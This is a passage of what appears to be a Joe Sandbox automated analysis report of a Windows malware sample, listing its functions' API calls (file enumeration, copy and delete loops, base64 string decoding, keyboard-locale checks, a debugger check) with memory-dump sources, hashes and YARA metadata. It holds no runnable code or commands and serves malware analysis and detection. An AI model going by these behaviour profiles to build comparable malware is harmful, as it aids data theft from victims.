                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                        • String ID: \*.*
                                                        • API String ID: 1415058207-1173974218
                                                        • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                        • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                        • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                        • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                        Function 00B2EF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B2EFA5
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B2EFBC
                                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 00B2F012
                                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 00B2F028
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2F515
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2F52A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                        • Instruction ID: 1158901caeb41cc0561eedd1acea218bdfb89dc8425d96b5f9aae7b294716eac
                                                        • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                        • Instruction Fuzzy Hash: 60E10672911218ABDB18FB60DD91EEEB3B9AF55700F6051E9B04A62052EF305FC9CF52
                                                        Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                        • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                        • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                        • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                        • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                        Function 00B2DCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 00B2DD52
                                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 00B2DD9A
                                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 00B2DDB0
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2E033
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2E045
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                        • Instruction ID: ed62cfee958d65f0488c79857b2c1b3e1a49a43a597d7e2d0675b42293a0416a
                                                        • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                        • Instruction Fuzzy Hash: D3918873900214ABCB14FBB0ED56DED73BDAF96301F6046ECB44A96151EE349B18CB92
                                                        Function 00B2F917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 00B2F985
                                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 00B2F9D6
                                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 00B2F9EC
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2FD18
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2FD2A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                        • Instruction ID: 421617ebc9faab2918a9f116d5f044ccb5af1e8f71a18243e81b94c32b0d0061
                                                        • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                        • Instruction Fuzzy Hash: 19B14372900218ABCB24FF64DD96FEE73B9AF55301F6081E9A44A56191EF305B48CF92
                                                        Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                        • String ID: \*.*$@
                                                        • API String ID: 433455689-2355794846
                                                        • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                        • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                        • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                        • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                        Function 00B21937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00B21B8A
                                                        • StrCmpCA.SHLWAPI(?,0042526C), ref: 00B21BDA
                                                        • StrCmpCA.SHLWAPI(?,00425314), ref: 00B21BF0
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B21FA7
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B22031
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B22087
                                                        • FindClose.KERNEL32(000000FF), ref: 00B22099
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 1415058207-0
                                                        • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                        • Instruction ID: 71f0089a09b58d478e63328ee02ce85c8adc06c00afcacc9b81126a303e784e8
                                                        • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                        • Instruction Fuzzy Hash: 01122E72910218ABCB19FB60DD96EEDB3B9AF55700F7045D9B14A62091EF306F88CF51
                                                        Function 00B2E077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 00B2E0C5
                                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 00B2E115
                                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 00B2E12B
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2E647
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2E659
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2325840235-0
                                                        • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                        • Instruction ID: 10c229e5918cf4170632c72c0d8f54e25ee9757de722b4aa4e83ee9b0f8ba69c
                                                        • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                        • Instruction Fuzzy Hash: 91F1D472510218ABCB19FB60DD95EEEB3B9AF15701FB051D9B05A620A1EF306F88CF51
                                                        Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                        • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                        • String ID: /
                                                        • API String ID: 3090951853-4001269591
                                                        • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                        • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                        • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                        • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                        Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 0040C853
                                                        • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008267F8), ref: 0040C871
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                        • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                        • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                        • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                        • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 1498829745-0
                                                        • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                        • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                        • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                        • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                        Function 00B2CA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00B2CABA
                                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B2CAD8
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B2CAE3
                                                        • memcpy.MSVCRT(?,?,?), ref: 00B2CB79
                                                        • lstrcat.KERNEL32(?,00420B46), ref: 00B2CBAA
                                                        • lstrcat.KERNEL32(?,00420B47), ref: 00B2CBBE
                                                        • lstrcat.KERNEL32(?,00420B4E), ref: 00B2CBDF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 1498829745-0
                                                        • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                        • Instruction ID: 8f4d99d24b67df89bde49f02e9081202fbe2298eb80436354d65a972e07e5932
                                                        • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                        • Instruction Fuzzy Hash: 9B41507894422DEFDB10DFD0ED89BEEBBB8FB44304F1045A8E509A6280D7745A84CF91
                                                        Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                        • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                        • String ID: N@
                                                        • API String ID: 4291131564-4229412743
                                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                        Function 00B37DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00B37E48
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00B37E60
                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B37E74
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B37EC9
                                                        • LocalFree.KERNEL32(00000000), ref: 00B37F89
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                        • String ID:
                                                        • API String ID: 3090951853-0
                                                        • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                        • Instruction ID: 6564c10d88340a2bad400b441f8e494188d3903f56df2c9de2b0bbcff6fb8fc4
                                                        • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                        • Instruction Fuzzy Hash: 884139B2940228ABCB24DB94DC89FEDB7B8FB45700F3041D9E009A6191DB742F85CFA1
                                                        Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                        Function 00B3B5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00B3BE09
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3BE1E
                                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 00B3BE29
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3BE45
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B3BE4C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction ID: 584a8685e8a3750ec6af3ba37e34e652b79d75b91f44fcd6230c22b8c0abfdc0
                                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
